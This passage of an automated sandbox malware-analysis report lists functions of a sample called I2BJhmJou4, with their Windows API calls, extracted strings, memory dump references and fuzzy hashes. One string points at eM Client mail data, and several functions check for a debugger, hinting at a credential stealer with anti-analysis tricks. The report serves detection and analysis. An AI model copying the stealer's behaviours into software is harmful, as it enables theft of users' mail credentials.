                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          • Opcode ID: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                          • Instruction ID: 8ec8fb1480d7890853f4d9f50d5551423c0e27afaeab5e375f7c18d1f8a446b0
                                                          • Opcode Fuzzy Hash: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                          • Instruction Fuzzy Hash: 7EB147329002559FFB11CF68C8817EFBBA5EF55304F14817BE815AB342D6389D0ACB69
                                                          Function 00451FBC Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                          • FindClose.KERNEL32(00000000), ref: 004520F4
                                                          • FindClose.KERNEL32(00000000), ref: 00452117
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                          • Instruction ID: 88b061fe18a59ed71dd7726e396f37314d98d9ff08531aa008276cfa6a830ce1
                                                          • Opcode Fuzzy Hash: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                          • Instruction Fuzzy Hash: 4F411971901519AFDF20DF64DD88ABFB379EB4530AF004197E905D3181E7B89E88CB69
                                                          Function 02F22223 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F222BE
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F22339
                                                          • FindClose.KERNEL32(00000000), ref: 02F2235B
                                                          • FindClose.KERNEL32(00000000), ref: 02F2237E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                          • Instruction ID: f94072b99dd1b1175db96afa3a26caed07acf8d56f7c6e0d6c2945dbaa6675ce
                                                          • Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                          • Instruction Fuzzy Hash: FE41D672E00139AADB20DF64CD88ABAB379EB46344F004195EE05D7184E7759E88CF65
                                                          Function 00416548 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 837COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: 0$8
                                                          • API String ID: 4218353326-46163386
                                                          • Opcode ID: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                          • Instruction ID: 4a4157f18493c412a49744d30cfcbbbc573f023624cab823fa42490c9b2fab12
                                                          • Opcode Fuzzy Hash: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                          • Instruction Fuzzy Hash: 037256716083409FCB14CF19C880BABBBE2AF88314F15892EF99887351D779D995CF96
                                                          Function 0043CE95 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
                                                          • IsDebuggerPresent.KERNEL32 ref: 0043CF6D
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                          • Instruction ID: 9043f40afcec0259649162862996236607bac432cbf7b643fd488768b54bd5d0
                                                          • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                          • Instruction Fuzzy Hash: 57312BB5D05219DBDB10DF65D989BCDBBB8AF08304F1040AAE40DA7250EBB55A84CF49
                                                          Function 02EFD221 Relevance: 5.4, Strings: 4, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                          • API String ID: 0-1928883120
                                                          • Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                          • Instruction ID: bfcd49b5a9c37cb01e98eeee986fe4a7e75a6b0e287125470228f3a6a382246f
                                                          • Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                          • Instruction Fuzzy Hash: 90E11DB1E8014A4BEF989A548D816FE7EB5EB14308F14E526E315FB250E735CA41CBD3
                                                          Function 02EF23DE Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryVirtual
                                                          • String ID: ]^4$^^4$^^4$^^4
                                                          • API String ID: 1804819252-2923853987
                                                          • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction ID: cab5482c37789c50093287a327aae99b917c1ffbfe61af988521940b86014f0b
                                                          • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction Fuzzy Hash: 0A515AB19853538BDAAC9E1C808426E62D0DB44248F55E927FF79FB220C324CC45EB47
                                                          Function 0044E33B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
                                                          • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                          • Instruction ID: af30a7423d53b2ed9e05bfdfaa0a26c4abe4ecd8aa3d0fdc8ac6f86824fa8700
                                                          • Opcode Fuzzy Hash: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                          • Instruction Fuzzy Hash: 2231C4749012299BCB21DF65D889BCDBBB8BF08310F5041EAE81CA7250E7749F858F49
                                                          Function 00424BED Relevance: 4.5, APIs: 3, Instructions: 32fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
                                                          • CloseHandle.KERNEL32(00000000), ref: 00424C2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleName
                                                          • String ID:
                                                          • API String ID: 2106025501-0
                                                          • Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                          • Instruction ID: 0f79836f08216e1067b19f7748282cd10e66abfb9a44897a3127195f29ea1e18
                                                          • Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                          • Instruction Fuzzy Hash: 97F0A071201130BBD2349B2AEC4CF57BF6CEF86B70F014215FB19AB2A0D2789812C6D5
                                                          Function 0041764A Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 917COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: =`f\
                                                          • API String ID: 4218353326-984147390
                                                          • Opcode ID: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                          • Instruction ID: 937e01e95affed1bb86c4fb585bebd6cec6f4652e38a753aecbb8c34d3dca93f
                                                          • Opcode Fuzzy Hash: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                          • Instruction Fuzzy Hash: E5822671508301AFDB14CF19C880AABBBE1FF88344F04892EF99987391D779D995CB96
                                                          Function 00415C7E Relevance: 3.9, Strings: 3, Instructions: 120COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3333$UUUU$UUUU
                                                          • API String ID: 0-1588839328
                                                          • Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                          • Instruction ID: db216e20b05cf36e7dbad7cd7ff9f755db6c04a52abf1afa55db9664f95289aa
                                                          • Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                          • Instruction Fuzzy Hash: 31419FB1610704CBCB588F19C88479277E6ABD8320F5981AADD058F38AE7B9CCC5CBC4
                                                          Function 00448800 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
                                                          • Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94
                                                          Function 02F18A67 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction ID: 96dab4b835c1d2911bf40d9d6a132ec542a2b6b418b8a98001ccf647f5ee93c3
                                                          • Opcode Fuzzy Hash: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction Fuzzy Hash: B6F15E71E012199FEF14CFA9C980AADB7B1FF88394F658269D915AB380D730A905CF94
                                                          Function 0043BCA4 Relevance: 3.1, Strings: 2, Instructions: 611COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>$y_B>
                                                          • API String ID: 0-2639510964
                                                          • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
                                                          • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA
                                                          Function 0043D600 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E
                                                            • Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                            • Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1
                                                          • _CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
                                                          • String ID:
                                                          • API String ID: 4086067019-0
                                                          • Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
                                                          • Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4
                                                          Function 0044614F Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1518329722-0
                                                          • Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
                                                          • Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295
                                                          Function 0045D15A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction ID: 2e63c45fd147d1bc419a1cf421641fdd954adc511095b72776a1a782a704c190
                                                          • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction Fuzzy Hash: EBB15E31A10605CFD724CF28C486B657BA0FF45366F258699EC99CF3A2C339E986CB45
                                                          Function 02F2D3C1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F2D31C,?,?,00000008,?,?,02F2CEF7,00000000), ref: 02F2D5EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction ID: f8949d5b20b1b398bfd6b6ea1841418aa684b7fbbd9418f4c01da594bcac43eb
                                                          • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction Fuzzy Hash: 13B14D32610618CFD719CF28C48AB657BA0FF463A8F258658E9D9CF2A1C335E995CF40
                                                          Function 004279E0 Relevance: 1.8, Strings: 1, Instructions: 509COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>
                                                          • API String ID: 0-1404922283
                                                          • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
                                                          • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B
                                                          Function 00415070 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: 318bea0468e25d50bc193c40de4e6b6217f0263c2ba9fd996b50af1c70fb3ca8
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: AE121370608740DFD724CF19C980BABBBE2FBC8304F54892EE58987350D779E9858B96
                                                          Function 02EE52D7 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: c5e8372de7d898db48012febf39b65a3599245ca56fa3b88f4c7493a07949394
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: 211224706487419FDB24CF19C884B6BBBE2BF88308F84992DF59A87250D775E948CF52
                                                          Function 00451F08 Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00450330: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                          • FindClose.KERNEL32(00000000), ref: 004520F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$AllocateCloseFirstHeapNext
                                                          • String ID:
                                                          • API String ID: 2963102669-0
                                                          • Opcode ID: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction ID: f7a7cccc38e2a98a3a0fd08442e24a40366e03b93faff9898a26c82b853a1aca
                                                          • Opcode Fuzzy Hash: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction Fuzzy Hash: 59413A726002096FDB14AF69DC85EBFB36AEF81319F14416BFD0597282EB789D08C658
                                                          Function 0043D0B8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043D0CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction ID: 4f8493139679013ee20e08bfcd7abab68794bcc2040eb7ee6f469f72a5842b4a
                                                          • Opcode Fuzzy Hash: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction Fuzzy Hash: E55106B1E002058FEB14CF55E8857ABBBF5FB48310F24947AD415EB354E3B8A980CB99
                                                          Function 00414A83 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction ID: 722ab9fffa63a2ef7d1a063d6d10cc189525accf299069018822edd1fef34131
                                                          • Opcode Fuzzy Hash: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction Fuzzy Hash: 74E125702083419FD724CF19C584BABB7E1BFC8354F05892EF59987250E778E989CB9A
                                                          Function 02F112BE Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction ID: 6805fc177e5a21a8fc89f3ef778ad857fbed6e7e0560c1e63e2cf7952b3af78f
                                                          • Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction Fuzzy Hash: 85C1DC74A0060A8FCF24CF68C5907AFB7B2AF06388F94461DD78E9B791D731A846CB51
                                                          Function 0040136E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: VUUU
                                                          • API String ID: 0-2040033107
                                                          • Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
                                                          • Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B
                                                          Function 0041F916 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryVirtual
                                                          • String ID:
                                                          • API String ID: 1804819252-0
                                                          • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
